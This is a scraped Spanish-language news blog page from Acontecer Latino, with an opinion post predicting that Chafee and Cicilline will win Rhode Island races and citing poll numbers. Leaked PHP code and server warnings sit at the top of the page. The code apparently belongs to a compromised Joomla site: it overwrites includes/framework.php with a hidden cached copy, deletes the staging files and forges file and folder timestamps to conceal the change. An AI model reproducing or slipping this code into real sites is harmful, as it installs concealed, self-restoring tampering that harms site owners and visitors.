$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Insisto: Cicilline y Chafee ganan

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: EXTRA! > BLOGS > Luis Peralta > Insisto: Cicilline y Chafee ganan

Insisto: Cicilline y Chafee ganan

Imprimir PDF

altEl ex senador y candidato independiente a la Gobernación de Rhode Island, Lincoln Chafee, viene dejando huellas de acero en el mundo político de Rhode Island.

Su candidatura va en ascenso, tal y como lo confirmó la encuesta del 21 de octubre, publicada el día 22 por la prestigiada encuestadora nacional “Rasmussen Reports”, que le da un margen de 7 puntos porcentuales de ventaja sobre el candidato demócrata Frank Caprio, cuatro puntos más que en la encuesta publicada el 6 de octubre.

La firma encuestadora consultó 750 potenciales electores, un 35 por ciento de los cuales dijo que votará por Chafee, mientras un 28 por ciento afirmó que votaría por Caprio.

Otro resultado interesante lo es el repunte del candidato republicano John Robitaille, quien alcanzó un 25 por ciento de preferencia, lo que podría ser indicativo de que John Robitaille podría estar cavando en la inestable mina política de Caprio, ya que su descenso no sólo es notorio en los resultados de la muestra de Rasmussen Reports; “Real Clear Politics”, que había dado a Caprio un porcentaje de 2.7 por encima de Chafee durante varias semanas, daba, el 22 de octubre, a Caprio con una ventaja de 1.7, lo cual confirma la tendencia descendente verificada en la encuesta Rasmussen.

Rasmussen Reports, y Real Clear Politics, son  dos encuestadoras certeras en sus predicciones de resultados electorales. Ambas tienen fama nacional de reflejar la preferencia real de los votantes en contiendas locales, estatales, y nacionales.

Además, el mensaje de Chafee ha sido directo, consistente, y claro.  Caprio no ha podido venderse como alternativa real, y la verdad es que no puede conquistar un voto demócrata íntegro, ni atraer atención republicana suficiente como para ganar, a parte del contra peso que le representa Robitaille.  En un escenario como ese, Chafee sale ganando.

Mientras tanto, en la batalla del Primer Distrito Congresual, David Cicilline sigue siendo abanderado de la mayor y más consistente simpatía. Su oponente, el representante estatal republicano conservador, J.J. Loughlin, dándose cuenta del peso que supone la preferencia mayoritaria entre los votantes latinoamericanos a favor de Cicilline, recurrió al expediente de chivos expiatorios, que somos los inmigrantes.

Pero no le funcionará.  Su ataque anti-inmigrante no hará sino despertar mayor interés en un número de votantes más significativo, con lo cual la victoria de Cicilline será más contundente.

Tal vez resulte incómodo para Cicilline, descender al terreno del republicano conservador, ante la presión de los medios por ganar audiencia, a través de interminables debates por televisión o radio, y ante el embate de algunos enemigos políticos internos; pero lo cierto es que este 2 de noviembre, logrará vencer.

Cicilline no necesita demostrarnos que es el mejor candidato y el que más  conviene y representa el interés de los electores latinoamericanos. JJ Loughlin, en cambio, es una piececita del confuso ajedrez conservador republicano que se opone a todos los valores que engrandecen la historia de los Estados Unidos.